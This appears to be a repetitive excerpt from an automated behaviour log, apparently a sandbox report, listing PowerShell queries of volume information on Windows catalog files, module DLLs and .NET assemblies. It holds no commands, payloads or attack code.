                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
